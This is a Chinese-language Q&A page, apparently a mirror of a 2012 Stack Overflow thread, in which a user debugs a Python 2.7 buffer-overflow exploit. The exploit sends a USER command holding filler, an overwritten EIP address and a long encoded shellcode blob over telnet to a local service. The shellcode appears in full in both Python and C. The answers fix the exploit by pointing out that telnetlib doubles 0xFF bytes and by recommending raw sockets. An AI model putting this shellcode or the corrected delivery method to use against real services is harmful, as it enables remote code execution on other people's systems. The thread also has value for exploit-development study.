1. 首頁
  2. 問答
  3. 我在我的Python中使用了一個小shellcode,但是失敗了

我在我的Python中使用了一個小shellcode,但是失敗了

2012-10-29 83 views
0

Python版本是2.7.3。我在我的Python中使用了一個小shellcode,但是失敗了

代碼是這樣的...... 完成的代碼是here

https://gist.github.com/3977494

shellcode = bytearray(
     "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49" 
     "\x49\x49\x49\x49\x48\x49\x49\x49\x49\x49\x49\x49\x51\x5a\x6a\x6a" 
     "\x58\x50\x30\x42\x31\x41\x42\x6b\x42\x41\x7a\x32\x42\x42\x42\x32" 
     "\x41\x41\x30\x41\x41\x58\x38\x42\x42\x50\x75\x4d\x39\x69\x6c\x6b" 
     "\x58\x53\x74\x77\x70\x67\x70\x73\x30\x6e\x6b\x61\x55\x57\x4c\x4e" 
     "\x6b\x51\x6c\x45\x55\x32\x58\x66\x61\x58\x6f\x6e\x6b\x50\x4f\x56" 
     "\x78\x4e\x6b\x41\x4f\x65\x70\x33\x31\x4a\x4b\x63\x79\x6e\x6b\x65" 
     "\x64\x4c\x4b\x57\x71\x7a\x4e\x37\x41\x4b\x70\x4e\x79\x6c\x6c\x4f" 
     "\x74\x4f\x30\x70\x74\x37\x77\x6f\x31\x79\x5a\x46\x6d\x67\x71\x4b" 
     "\x72\x5a\x4b\x38\x74\x65\x6b\x41\x44\x47\x54\x43\x34\x52\x55\x68" 
     "\x65\x4e\x6b\x33\x6f\x34\x64\x37\x71\x4a\x4b\x72\x46\x6c\x4b\x64" 
     "\x4c\x50\x4b\x6c\x4b\x51\x4f\x35\x4c\x63\x31\x68\x6b\x4c\x4b\x35" 
     "\x4c\x4c\x4b\x45\x51\x7a\x4b\x6c\x49\x73\x6c\x56\x44\x65\x54\x5a" 
     "\x63\x50\x31\x69\x50\x61\x74\x6c\x4b\x67\x30\x64\x70\x6b\x35\x4f" 
     "\x30\x72\x58\x34\x4c\x4c\x4b\x71\x50\x44\x4c\x4c\x4b\x72\x50\x55" 
     "\x4c\x4c\x6d\x4e\x6b\x73\x58\x53\x38\x68\x6b\x36\x69\x4e\x6b\x6b" 
     "\x30\x78\x30\x55\x50\x75\x50\x55\x50\x6c\x4b\x52\x48\x57\x4c\x41" 
     "\x4f\x47\x41\x4a\x56\x71\x70\x76\x36\x6d\x59\x69\x68\x4d\x53\x6b" 
     "\x70\x33\x4b\x52\x70\x30\x68\x68\x70\x6d\x5a\x74\x44\x33\x6f\x70" 
     "\x68\x6d\x48\x6b\x4e\x6f\x7a\x64\x4e\x41\x47\x4b\x4f\x4b\x57\x42" 
     "\x43\x70\x6d\x63\x54\x36\x4e\x71\x75\x61\x68\x30\x65\x65\x70\x64" 
     "\x6f\x31\x73\x71\x30\x62\x4e\x42\x45\x52\x54\x61\x30\x53\x45\x71" 
     "\x63\x75\x35\x30\x72\x37\x50\x72\x48\x50\x61\x62\x43\x52\x4b\x41" 
     "\x30\x75\x38\x43\x51\x45\x33\x70\x6b\x45\x70\x54\x6f\x72\x61\x42" 
     "\x64\x61\x54\x71\x30\x46\x46\x55\x76\x41\x30\x30\x6e\x61\x75\x71" 
     "\x64\x41\x30\x32\x4c\x52\x4f\x41\x73\x73\x51\x52\x4c\x43\x57\x54" 
     "\x32\x52\x4f\x62\x55\x44\x30\x67\x50\x53\x71\x33\x54\x62\x4d\x61" 
     "\x79\x42\x4e\x42\x49\x51\x63\x62\x54\x32\x52\x70\x61\x74\x34\x42" 
     "\x4f\x61\x62\x31\x63\x31\x30\x61\x78\x33\x51\x31\x73\x50\x6b\x65" 
     "\x70\x46\x4f\x63\x71\x61\x54\x61\x54\x63\x30\x6a" 
     ) 

tn = telnetlib.Telnet('127.0.0.1', 11000) 
user_string = "USER " + fill + eip_address + fill2 + shellcode + '\n' 
tn.write(user_string) 
pass_string = "PASS 123\n" 
tn.write(pass_string)

我的朋友使用在C一切正常相同的字符串。當我檢查ollyDbg時,我發現這個命令是不同的,看起來python改變了編碼類型。我不知道...有什麼幫助嗎?這讓我瘋狂。

unsigned char shellcode[] = 
     "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49" 
     "\x49\x49\x49\x49\x48\x49\x49\x49\x49\x49\x49\x49\x51\x5a\x6a\x6a" 
     "\x58\x50\x30\x42\x31\x41\x42\x6b\x42\x41\x7a\x32\x42\x42\x42\x32" 
     "\x41\x41\x30\x41\x41\x58\x38\x42\x42\x50\x75\x4d\x39\x69\x6c\x6b" 
     "\x58\x53\x74\x77\x70\x67\x70\x73\x30\x6e\x6b\x61\x55\x57\x4c\x4e" 
     "\x6b\x51\x6c\x45\x55\x32\x58\x66\x61\x58\x6f\x6e\x6b\x50\x4f\x56" 
     "\x78\x4e\x6b\x41\x4f\x65\x70\x33\x31\x4a\x4b\x63\x79\x6e\x6b\x65" 
     "\x64\x4c\x4b\x57\x71\x7a\x4e\x37\x41\x4b\x70\x4e\x79\x6c\x6c\x4f" 
     "\x74\x4f\x30\x70\x74\x37\x77\x6f\x31\x79\x5a\x46\x6d\x67\x71\x4b" 
     "\x72\x5a\x4b\x38\x74\x65\x6b\x41\x44\x47\x54\x43\x34\x52\x55\x68" 
     "\x65\x4e\x6b\x33\x6f\x34\x64\x37\x71\x4a\x4b\x72\x46\x6c\x4b\x64" 
     "\x4c\x50\x4b\x6c\x4b\x51\x4f\x35\x4c\x63\x31\x68\x6b\x4c\x4b\x35" 
     "\x4c\x4c\x4b\x45\x51\x7a\x4b\x6c\x49\x73\x6c\x56\x44\x65\x54\x5a" 
     "\x63\x50\x31\x69\x50\x61\x74\x6c\x4b\x67\x30\x64\x70\x6b\x35\x4f" 
     "\x30\x72\x58\x34\x4c\x4c\x4b\x71\x50\x44\x4c\x4c\x4b\x72\x50\x55" 
     "\x4c\x4c\x6d\x4e\x6b\x73\x58\x53\x38\x68\x6b\x36\x69\x4e\x6b\x6b" 
     "\x30\x78\x30\x55\x50\x75\x50\x55\x50\x6c\x4b\x52\x48\x57\x4c\x41" 
     "\x4f\x47\x41\x4a\x56\x71\x70\x76\x36\x6d\x59\x69\x68\x4d\x53\x6b" 
     "\x70\x33\x4b\x52\x70\x30\x68\x68\x70\x6d\x5a\x74\x44\x33\x6f\x70" 
     "\x68\x6d\x48\x6b\x4e\x6f\x7a\x64\x4e\x41\x47\x4b\x4f\x4b\x57\x42" 
     "\x43\x70\x6d\x63\x54\x36\x4e\x71\x75\x61\x68\x30\x65\x65\x70\x64" 
     "\x6f\x31\x73\x71\x30\x62\x4e\x42\x45\x52\x54\x61\x30\x53\x45\x71" 
     "\x63\x75\x35\x30\x72\x37\x50\x72\x48\x50\x61\x62\x43\x52\x4b\x41" 
     "\x30\x75\x38\x43\x51\x45\x33\x70\x6b\x45\x70\x54\x6f\x72\x61\x42" 
     "\x64\x61\x54\x71\x30\x46\x46\x55\x76\x41\x30\x30\x6e\x61\x75\x71" 
     "\x64\x41\x30\x32\x4c\x52\x4f\x41\x73\x73\x51\x52\x4c\x43\x57\x54" 
     "\x32\x52\x4f\x62\x55\x44\x30\x67\x50\x53\x71\x33\x54\x62\x4d\x61" 
     "\x79\x42\x4e\x42\x49\x51\x63\x62\x54\x32\x52\x70\x61\x74\x34\x42" 
     "\x4f\x61\x62\x31\x63\x31\x30\x61\x78\x33\x51\x31\x73\x50\x6b\x65" 
     "\x70\x46\x4f\x63\x71\x61\x54\x61\x54\x63\x30\x6a";

enter image description here

哦,我知道了差不多。 00AEFD70有這麼多FF。爲什麼?

我在C++中編寫了相同的函數代碼。一切正常。這是比較。

enter image description here 換句話說,發生了什麼?

enter image description here

來源

2012-10-29 jeswang

+0

我不認爲複製字符串就足夠了,根據您的文章,沒有什麼幫助......您是否嘗試遵循此http://r00tsec.blogspot.it/2011/10/python-one- line-shellcode.html也許? –

+0

bytearray!= unchar,我認爲 – njzk2

+0

@ njzk2爲什麼?我認爲他們做了同樣的事情,他們都是小端。 – jeswang

回答

2

telnet lib documentation表明,(重點煤礦):

寫一個字符串到插座,加倍任何IAC字符。這可以阻止連接被阻止。如果連接關閉,可能會引發socket.error。

IAC字符恰好是ASCII 255,即'\xff'

如果比較兩個轉儲:在python版本中,IAC字符FF加倍,但不是在使用原始套接字的C版本中,也可以使用socket模塊在Python中完成。

來源

2012-10-30 00:28:46

+0

男人!你太棒了!問題解決了。它花了很多時間! – jeswang

+0

@Eout總是樂於幫助:) –

+0

只是一些額外的建議:任何時候你試圖弄亂任何類型的shellcode或網絡測試,使用直接的TCP套接字而不是telnet。也就是說,在Linux上使用'nc'(netcat),編程時使用常規套接字(在Python中,套接字(AF_INET,SOCK_STREAM)')。 – Anorov

2

您使用的bytearray可改變的shellcode,嘗試定義的shellcode沒有bytearray功能。 e.g:

shellcode = (
     "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49" 
     "\x49\x49\x49\x49\x48\x49\x49\x49\x49\x49\x49\x49\x51\x5a\x6a\x6a" 
     "\x58\x50\x30\x42\x31\x41\x42\x6b\x42\x41\x7a\x32\x42\x42\x42\x32" 
     ... 
     ... 
)

來源

2012-10-29 16:41:22

+0

我知道這是一箇舊帖子,但這幫助我編寫了一個編碼器。謝謝克雷格! – Coeus

相關問題

 相關問題